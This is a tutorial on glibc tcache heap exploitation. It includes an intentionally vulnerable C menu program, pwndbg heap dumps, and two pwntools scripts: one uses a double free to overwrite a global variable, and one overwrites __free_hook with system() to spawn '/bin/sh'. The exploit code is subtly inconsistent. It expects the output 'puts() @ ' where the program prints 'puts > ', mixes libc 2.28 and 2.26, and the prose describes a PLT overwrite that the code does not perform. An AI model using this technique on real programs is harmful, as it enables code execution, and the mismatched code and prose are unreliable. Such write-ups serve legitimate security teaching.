Heap Thread Cache Exploitation

In the previous article, we looked at exploiting heap fastbins using an older version of glibc. In glibc version 2.26, a performance optimisation known as thread caching (tcache) was introduced.

A heap arena is a data structure shared among threads which references other heaps and contains a list of chunks on those heaps which are free. The number of heap arenas is limited by the number of cores which are available to a process. When this number is exceeded, new threads must share access to the existing arenas via a locking mechanism to regulate access. This locking behaviour obviously has a performance impact.

Thread caching addresses this problem by giving each thread it’s own tcache, which is essentially an arena.

For our purposes thread caching operates in a similar fashion to the fastbins.

For testing, we’re using Ubuntu 17.10 as this was the first version to include TCACHE support.

Vulnerable Application Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// compile with:
// g++ test.c -o test -no-pie -Wl,-z,norelro -z now -ggdb

char target[7] = "target";


int main () {

char *m_array [8];

m_array[0] = (char *)0x0;
m_array[1] = (char *)0x0;
m_array[2] = (char *)0x0;
m_array[3] = (char *)0x0;
m_array[4] = (char *)0x0;
m_array[5] = (char *)0x0;
m_array[6] = (char *)0x0;
m_array[7] = (char *)0x0;

setvbuf(stdout,(char *)0x0,2,0);

printf("puts > %p\n",puts);

  int i;
  int ChunkNumber = 0;
  for (i = 1; i < 20; ++i)
  {
      int selection;
      printf("Target : %s\n", target);
      printf("Next chunk number: %d/7 \n", ChunkNumber);

      printf("1) malloc\n");
      printf("2) free\n");
      printf("3) quit\n");
      printf(">");
      scanf("%d", &selection);

      fflush (stdin);
  switch(selection){

    int mallocSize;
    char inputData[256];
    
    case 1:
      printf ("malloc size: \n");
      scanf("%d", &mallocSize);

      printf ("input data: \n");
      scanf("%s", inputData);

      // Allocate heap memory chunk. Size based on previous user input
      char *heapChunk;
      m_array[ChunkNumber] = (char *) malloc(mallocSize);
      strcpy(m_array[ChunkNumber],inputData);

      printf("chunk allocated: %d/7 \n", ChunkNumber);

      ChunkNumber++;
      break;
    case 2:
      printf("Select chunk to free: ");
      scanf("%d", &selection);
      printf("Freeing chunk: %d\n", selection);
      free(m_array[selection]);
      break;
    case 3:
        exit(0);
      break;
    default:
      printf("Invalid selection\n");
      break;
  }

  }
   
  return(0);
}

Analysing the Heap

The above application operates similarly to the last one we looked at allowing for allocation and freeing of memory.

In our Python code we can attempt to free the same chunk of memory twice.

chunk_A = malloc(24, b"A"*8)

# Double Free Chunk A
free(chunk_A)
free(chunk_A)

Resulting heap allocation:

pwndbg> vis_heap_chunks 

0x602000	0x0000000000000000	0x0000000000000251	........Q.......
0x602010	0x0000000000000002	0x0000000000000000	................ <-- count of items in tcachebin
0x602020	0x0000000000000000	0x0000000000000000	................
0x602030	0x0000000000000000	0x0000000000000000	................
0x602040	0x0000000000000000	0x0000000000000000	................
0x602050	0x0000000000603270	0x0000000000000000	p2`............. <-- pointer to user data
0x602060	0x0000000000000000	0x0000000000000000	................
<truncated>
0x603260	0x0000000000000000	0x0000000000000021	........!....... <-- size field
0x603270	0x0000000000603270	0x0000000000000000	p2`............. <-- tcachebins[0x20][0/2], tcachebins[0x20][0/2]
0x603280	0x0000000000000000	0x000000000001fd81	................ <-- Top chunk
pwndbg> fastbins 
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
pwndbg> tcachebins 
tcachebins
0x20 [  2]: 0x603270 ◂— 0x603270 /* 'p2`' */

We can see the memory has been freed twice, without us having to bypass the mitigations we saw with the fastbins. On previous glibc versions, our small memory chunks would have been placed in the fastbin. However on tcache enabled glibc they are instead sent to the tcachebin.

One difference from fastbin memory is that the tcachbin pointer is directed at the user data rather than the chunk header.

When we exploited the fastbin memory we needed to ensure the size field was correctly set, however this is not required in glibc 2.26 TCACHE memory. As such, overwriting a variable is just a matter of;

  • malloc() once to allocate some memory.
  • free() twice on the chunk of memory we allocated.
  • malloc() again, and writing the pointer to the target memory address we aim to overwrite. This leaves the tcache bin in the following state: 0x20 [ 1]: 0x603270 —▸ 0x601290 (target)
  • malloc() once more with random data to remove the corrupted forward pointer (0x603270), and make our target data (0x601290) the next chunk to be retrieved.
  • Finally, call malloc() with the value we wish to overwrite.

Arbitrary Write Exploit Code

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("./test")
libc = ELF(b"/lib/x86_64-linux-gnu/libc-2.28.so")

context.log_level = 'debug'

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

index = 0
def malloc(size, data):
    global index
    io.sendline(b"1")
    io.sendlineafter(b"malloc size:", f"{size}".encode())
    io.sendlineafter(b"input data:", data)
    index += 1
    return index - 1

def free(index):
    io.recvuntil(b">")
    io.sendline(b"2")
    io.sendlineafter(b"Select chunk to free:", f"{index}".encode())
    io.recvuntil(b">")

io = start()
io.timeout = 2.0

io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts
io.recvuntil(b">")

chunk_A = malloc(24, b"A"*8)

free(chunk_A)
free(chunk_A)

malloc(24, pack(elf.symbols.target))

malloc(24, b"A"*8)
malloc(24, b"PWND   ")

io.sendline(b"\n")

io.interactive()

Command Execution

Using our arbitrary write primitive, we can achieve command execution.

The Procedure Linkage Table (PLT) stores the addresses of functions which are resolved at run time, rather than when the file is linked.

To get a shell, we can overwrite the (PLT) entry for the free() function so the next time it’s called it will execute a command of our choosing, such as system() to execute a command.

The application leaks the address of puts() which we’re using to calculate the libc base address. pwntools can then automatically calculate the address of system().

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("./test")
libc = ELF(b"/lib/x86_64-linux-gnu/libc-2.26.so")

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

index = 0
def malloc(size, data):
    global index
    io.sendline(b"1")
    io.sendlineafter(b"malloc size:", f"{size}".encode())
    io.sendlineafter(b"input data:", data)
    index += 1
    return index - 1

def free(index):
    io.recvuntil(b">")
    io.sendline(b"2")
    io.sendlineafter(b"Select chunk to free:", f"{index}".encode())
    io.recvuntil(b">")

io = start()
io.timeout = 2.0

io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts
io.recvuntil(b">")

chunk_A = malloc(24, b"A"*8)

# Double Free Chunk A
free(chunk_A)
free(chunk_A)

# Set forward pointer to free() hook
malloc(24, pack(libc.sym.__free_hook))

# create reference to /bin/sh string
binsh = malloc(24, b"/bin/sh\0")

# execute system()
malloc(24, pack(libc.sym.system))

free(binsh)

io.interactive()

Resulting shell: